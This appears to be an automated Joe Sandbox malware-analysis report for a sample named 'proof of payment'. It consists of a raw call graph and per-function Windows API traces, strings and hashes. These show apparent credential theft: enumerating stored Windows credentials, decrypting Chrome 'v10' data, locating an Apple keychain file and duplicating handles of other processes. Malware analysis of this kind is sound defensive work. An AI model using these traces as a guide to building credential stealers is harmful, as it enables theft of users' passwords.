39011->39012 39013 409d1f 6 API calls 39012->39013 39014 40e658 39013->39014 39024 409b98 GetFileAttributesW 39014->39024 39016 40e667 39017 
40e680 39016->39017 39019 409d1f 6 API calls 39016->39019 39025 409b98 GetFileAttributesW 39017->39025 39019->39017 39020 40e68f 39021 40c2d8 39020->39021 39026 40e4b2 39020->39026 39021->38933 39021->38934 39023->39005 39024->39016 39025->39020 39047 40e01e 39026->39047 39028 40e593 39030 40e5b0 39028->39030 39031 40e59c DeleteFileW 39028->39031 39029 40e521 39029->39028 39070 40e175 39029->39070 39032 40b04b ??3@YAXPAX 39030->39032 39031->39030 39033 40e5bb 39032->39033 39035 40e5c4 CloseHandle 39033->39035 39036 40e5cc 39033->39036 39035->39036 39038 40b633 ??3@YAXPAX 39036->39038 39037 40e573 39039 40e584 39037->39039 39040 40e57c FindCloseChangeNotification 39037->39040 39041 40e5db 39038->39041 39091 40b1ab ??3@YAXPAX ??3@YAXPAX 39039->39091 39040->39039 39044 40b633 ??3@YAXPAX 39041->39044 39043 40e540 39043->39037 39090 40e2ab 30 API calls 39043->39090 39045 40e5e3 39044->39045 39045->39021 39048 406214 22 API calls 39047->39048 39049 40e03c 39048->39049 39050 40e16b 39049->39050 39051 40dd85 74 API calls 39049->39051 39050->39029 39052 40e06b 39051->39052 39052->39050 39053 40afcf ??2@YAPAXI ??3@YAXPAX 39052->39053 39054 40e08d OpenProcess 39053->39054 39055 40e0a4 GetCurrentProcess DuplicateHandle 39054->39055 39059 40e152 39054->39059 39056 40e0d0 GetFileSize 39055->39056 39057 40e14a CloseHandle 39055->39057 39060 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39056->39060 39057->39059 39058 40e160 39062 40b04b ??3@YAXPAX 39058->39062 39059->39058 39061 406214 22 API calls 39059->39061 39063 40e0ea 39060->39063 39061->39058 39062->39050 39064 4096dc CreateFileW 39063->39064 39065 40e0f1 CreateFileMappingW 39064->39065 39066 40e140 CloseHandle CloseHandle 39065->39066 39067 40e10b MapViewOfFile 39065->39067 39066->39057 39068 40e13b FindCloseChangeNotification 39067->39068 39069 40e11f WriteFile UnmapViewOfFile 39067->39069 39068->39066 39069->39068 39071 40e18c 39070->39071 39072 406b90 11 API calls 39071->39072 39073 40e19f 39072->39073 
39074 40e1a7 memset 39073->39074 39075 40e299 39073->39075 39080 40e1e8 39074->39080 39076 4069a3 ??3@YAXPAX ??3@YAXPAX 39075->39076 39077 40e2a4 39076->39077 39077->39043 39078 406e8f 13 API calls 39078->39080 39079 406b53 SetFilePointerEx ReadFile 39079->39080 39080->39078 39080->39079 39081 40e283 39080->39081 39082 40dd50 _wcsicmp 39080->39082 39086 40742e 8 API calls 39080->39086 39087 40aae3 wcslen wcslen _memicmp 39080->39087 39088 40e244 _snwprintf 39080->39088 39083 40e291 39081->39083 39084 40e288 ??3@YAXPAX 39081->39084 39082->39080 39085 40aa04 ??3@YAXPAX 39083->39085 39084->39083 39085->39075 39086->39080 39087->39080 39089 40a8d0 7 API calls 39088->39089 39089->39080 39090->39043 39091->39028 39094 40a980 39092->39094 39093 40a8bb 39093->38953 39093->38954 39094->39093 39095 40a995 _wcsicmp 39094->39095 39096 40a99c wcscmp 39094->39096 39095->39094 39096->39094 39097->38957 39098->38961 39100 40aa23 RegEnumValueW 39099->39100 39100->38968 39100->38969 39102 405335 39101->39102 39103 40522a 39101->39103 39102->38551 39104 40b2cc 27 API calls 39103->39104 39105 405234 39104->39105 39106 40a804 8 API calls 39105->39106 39107 40523a 39106->39107 39146 40b273 39107->39146 39109 405248 _mbscpy _mbscat GetProcAddress 39110 40b273 27 API calls 39109->39110 39111 405279 39110->39111 39149 405211 GetProcAddress 39111->39149 39113 405282 39114 40b273 27 API calls 39113->39114 39115 40528f 39114->39115 39150 405211 GetProcAddress 39115->39150 39117 405298 39118 40b273 27 API calls 39117->39118 39119 4052a5 39118->39119 39151 405211 GetProcAddress 39119->39151 39121 4052ae 39122 40b273 27 API calls 39121->39122 39123 4052bb 39122->39123 39152 405211 GetProcAddress 39123->39152 39125 4052c4 39126 40b273 27 API calls 39125->39126 39127 4052d1 39126->39127 39153 405211 GetProcAddress 39127->39153 39129 4052da 39147 40b58d 27 API calls 39146->39147 39148 40b18c 39147->39148 39148->39109 39149->39113 39150->39117 39151->39121 39152->39125 39153->39129 39159 405220 39 
API calls 39158->39159 39160 405369 39159->39160 39160->38986 39160->38987 39161->38990 39162->38993 39163->38989 39164->38987 39166 40440c FreeLibrary 39165->39166 39167 40436d 39166->39167 39168 40a804 8 API calls 39167->39168 39169 404377 39168->39169 39170 404383 39169->39170 39171 404405 39169->39171 39172 40b273 27 API calls 39170->39172 39171->38560 39171->38562 39171->38563 39173 40438d GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043a7 GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043ba GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ce GetProcAddress 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043e2 GetProcAddress 39180->39181 39182 4043f1 39181->39182 39183 4043f7 39182->39183 39184 40440c FreeLibrary 39182->39184 39183->39171 39184->39171 39186 404413 FreeLibrary 39185->39186 39187 40441e 39185->39187 39186->39187 39187->38577 39188->38568 39190 40442e 39189->39190 39191 40447e 39189->39191 39192 40b2cc 27 API calls 39190->39192 39191->38568 39193 404438 39192->39193 39194 40a804 8 API calls 39193->39194 39195 40443e 39194->39195 39196 404445 39195->39196 39197 404467 39195->39197 39198 40b273 27 API calls 39196->39198 39197->39191 39199 404475 FreeLibrary 39197->39199 39200 40444f GetProcAddress 39198->39200 39199->39191 39200->39197 39201 404460 39200->39201 39201->39197 39203 4135f6 39202->39203 39204 4135eb FreeLibrary 39202->39204 39203->38580 39204->39203 39206 4449c4 39205->39206 39207 444a52 39205->39207 39208 40b2cc 27 API calls 39206->39208 39207->38597 39207->38598 39232 403a29 39231->39232 39246 403bed memset memset 39232->39246 39234 403ae7 39259 40b1ab ??3@YAXPAX ??3@YAXPAX 39234->39259 39235 403a3f memset 39241 403a2f 39235->39241 39237 403aef 39237->38616 39238 409b98 GetFileAttributesW 39238->39241 39239 40a8d0 7 API calls 39239->39241 39240 409d1f 6 API calls 39240->39241 39241->39234 39241->39235 39241->39238 39241->39239 39241->39240 
39243 40a051 GetFileTime FindCloseChangeNotification 39242->39243 39244 4039ca CompareFileTime 39242->39244 39243->39244 39244->38616 39245->38615 39247 414c2e 16 API calls 39246->39247 39248 403c38 39247->39248 39249 409719 2 API calls 39248->39249 39250 403c3f wcscat 39249->39250 39251 414c2e 16 API calls 39250->39251 39252 403c61 39251->39252 39253 409719 2 API calls 39252->39253 39254 403c68 wcscat 39253->39254 39260 403af5 39254->39260 39257 403af5 20 API calls 39258 403c95 39257->39258 39258->39241 39259->39237 39261 403b02 39260->39261 39262 40ae18 9 API calls 39261->39262 39270 403b37 39262->39270 39263 403bdb 39265 40aebe FindClose 39263->39265 39264 40add4 wcscmp wcscmp 39264->39270 39266 403be6 39265->39266 39266->39257 39267 40ae18 9 API calls 39267->39270 39268 40ae51 9 API calls 39268->39270 39269 40aebe FindClose 39269->39270 39270->39263 39270->39264 39270->39267 39270->39268 39270->39269 39271 40a8d0 7 API calls 39270->39271 39271->39270 39273 409d1f 6 API calls 39272->39273 39274 404190 39273->39274 39287 409b98 GetFileAttributesW 39274->39287 39276 40419c 39277 4041a7 6 API calls 39276->39277 39278 40435c 39276->39278 39280 40424f 39277->39280 39278->38642 39280->39278 39281 40425e memset 39280->39281 39283 409d1f 6 API calls 39280->39283 39284 40a8ab 9 API calls 39280->39284 39288 414842 39280->39288 39281->39280 39282 404296 wcscpy 39281->39282 39282->39280 39283->39280 39285 4042b6 memset memset _snwprintf wcscpy 39284->39285 39285->39280 39286->38640 39287->39276 39291 41443e 39288->39291 39290 414866 39290->39280 39292 41444b 39291->39292 39293 414451 39292->39293 39294 4144a3 GetPrivateProfileStringW 39292->39294 39295 414491 39293->39295 39296 414455 wcschr 39293->39296 39294->39290 39297 414495 WritePrivateProfileStringW 39295->39297 39296->39295 39298 414463 _snwprintf 39296->39298 39297->39290 39298->39297 39299->38646 39301 40b2cc 27 API calls 39300->39301 39302 409615 39301->39302 39303 409d1f 6 API calls 39302->39303 39304 409625 
39303->39304 39329 409b98 GetFileAttributesW 39304->39329 39306 409634 39307 409648 39306->39307 39330 4091b8 memset 39306->39330 39309 40b2cc 27 API calls 39307->39309 39311 408801 39307->39311 39310 40965d 39309->39310 39312 409d1f 6 API calls 39310->39312 39311->38649 39311->38650 39313 40966d 39312->39313 39382 409b98 GetFileAttributesW 39313->39382 39315 40967c 39315->39311 39316 409681 39315->39316 39383 409529 72 API calls 39316->39383 39329->39306 39384 40a6e6 WideCharToMultiByte 39330->39384 39332 409202 39385 444432 39332->39385 39335 40b273 27 API calls 39362 40951d 39362->39307 39382->39315 39384->39332 39481 4438b5 39385->39481 39387 44444c 39393 409215 39387->39393 39495 415a6d 39387->39495 39393->39335 39393->39362 39482 4438d0 39481->39482 39493 4438c9 39481->39493 39483 415378 memcpy memcpy 39482->39483 39484 4438d5 39483->39484 39484->39493 39493->39387 39496 415a77 39495->39496 39616 413f4f 39589->39616 39592 413f37 K32GetModuleFileNameExW 39593 413f4a 39592->39593 39593->38708 39595 413969 wcscpy 39594->39595 39596 41396c wcschr 39594->39596 39608 413a3a 39595->39608 39596->39595 39598 41398e 39596->39598 39621 4097f7 wcslen wcslen _memicmp 39598->39621 39600 41399a 39601 4139a4 memset 39600->39601 39602 4139e6 39600->39602 39622 409dd5 GetWindowsDirectoryW wcscpy 39601->39622 39604 413a31 wcscpy 39602->39604 39605 4139ec memset 39602->39605 39604->39608 39623 409dd5 GetWindowsDirectoryW wcscpy 39605->39623 39606 4139c9 wcscpy wcscat 39606->39608 39608->38708 39609 413a11 memcpy wcscat 39609->39608 39611 413cb0 GetModuleHandleW 39610->39611 39612 413cda 39610->39612 39611->39612 39613 413cbf GetProcAddress 39611->39613 39614 413ce3 GetProcessTimes 39612->39614 39615 413cf6 39612->39615 39613->39612 39614->38711 39615->38711 39617 413f2f 39616->39617 39618 413f54 39616->39618 39617->39592 39617->39593 39619 40a804 8 API calls 39618->39619 39620 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39619->39620 
39620->39617 39621->39600 39622->39606 39623->39609 39624->38732 39625->38755 39627 409cf9 GetVersionExW 39626->39627 39628 409d0a 39626->39628 39627->39628 39628->38761 39628->38765 39629->38767 39630->38770 39631->38772 39632->38837 39634 40bba5 39633->39634 39681 40cc26 39634->39681 39637 40bd4b 39702 40cc0c 39637->39702 39642 40b2cc 27 API calls 39643 40bbef 39642->39643 39709 40ccf0 _wcsicmp 39643->39709 39645 40bbf5 39645->39637 39710 40ccb4 6 API calls 39645->39710 39647 40bc26 39648 40cf04 17 API calls 39647->39648 39649 40bc2e 39648->39649 39650 40bd43 39649->39650 39651 40b2cc 27 API calls 39649->39651 39652 40cc0c 4 API calls 39650->39652 39653 40bc40 39651->39653 39652->39637 39711 40ccf0 _wcsicmp 39653->39711 39655 40bc46 39655->39650 39656 40bc61 memset memset WideCharToMultiByte 39655->39656 39712 40103c strlen 39656->39712 39658 40bcc0 39659 40b273 27 API calls 39658->39659 39660 40bcd0 memcmp 39659->39660 39660->39650 39661 40bce2 39660->39661 39662 404423 37 API calls 39661->39662 39663 40bd10 39662->39663 39663->39650 39664 40bd3a LocalFree 39663->39664 39665 40bd1f memcpy 39663->39665 39664->39650 39665->39664 39666->38852 39668 409a74 GetTempFileNameW 39667->39668 39669 409a66 GetWindowsDirectoryW 39667->39669 39668->38851 39669->39668 39670->38889 39671->38889 39672->38889 39673->38889 39674->38889 39675->38889 39676->38889 39677->38889 39678->38889 39679->38864 39680->38886 39713 4096c3 CreateFileW 39681->39713 39683 40cc34 39684 40cc3d GetFileSize 39683->39684 39692 40bbca 39683->39692 39685 40afcf 2 API calls 39684->39685 39686 40cc64 39685->39686 39714 40a2ef ReadFile 39686->39714 39688 40cc71 39715 40ab4a MultiByteToWideChar 39688->39715 39690 40cc95 FindCloseChangeNotification 39691 40b04b ??3@YAXPAX 39690->39691 39691->39692 39692->39637 39693 40cf04 39692->39693 39694 40b633 ??3@YAXPAX 39693->39694 39695 40cf14 39694->39695 39721 40b1ab ??3@YAXPAX ??3@YAXPAX 39695->39721 39697 40bbdd 39697->39637 39697->39642 39698 40cf1b 39698->39697 

                                      APIs
                                      • memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                      • memset.MSVCRT ref: 0040DF5F
                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                      • API String ID: 594330280-3398334509
                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                      • String ID:
                                      • API String ID: 2947809556-0
                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0041898C
                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: InfoSystemmemset
                                      • String ID:
                                      • API String ID: 3558857096-0
                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 004455C2
                                      • wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 0044570D
                                      • memset.MSVCRT ref: 00445725
                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                        • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      • memset.MSVCRT ref: 0044573D
                                      • memset.MSVCRT ref: 00445755
                                      • memset.MSVCRT ref: 004458CB
                                      • memset.MSVCRT ref: 004458E3
                                      • memset.MSVCRT ref: 0044596E
                                      • memset.MSVCRT ref: 00445A10
                                      • memset.MSVCRT ref: 00445A28
                                      • memset.MSVCRT ref: 00445AC6
                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      • memset.MSVCRT ref: 00445B52
                                      • memset.MSVCRT ref: 00445B6A
                                      • memset.MSVCRT ref: 00445C9B
                                      • memset.MSVCRT ref: 00445CB3
                                      • _wcsicmp.MSVCRT ref: 00445D56
                                      • memset.MSVCRT ref: 00445B82
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                      • memset.MSVCRT ref: 00445986
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                      • API String ID: 2745753283-3798722523
                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                      • String ID: $/deleteregkey$/savelangfile
                                      • API String ID: 2744995895-28296030
                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                      • wcsrchr.MSVCRT ref: 0040B738
                                      • memset.MSVCRT ref: 0040B756
                                      • memset.MSVCRT ref: 0040B7F5
                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                      • memset.MSVCRT ref: 0040B851
                                      • memset.MSVCRT ref: 0040B8CA
                                      • memcmp.MSVCRT ref: 0040B9BF
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                      • memset.MSVCRT ref: 0040BB53
                                      • memcpy.MSVCRT ref: 0040BB66
                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                      • String ID: chp$v10
                                      • API String ID: 170802307-2783969131
                                      • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                      • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                      • String ID:
                                      • API String ID: 3715365532-3916222277
                                      • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                      • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                      • memset.MSVCRT ref: 00413D7F
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
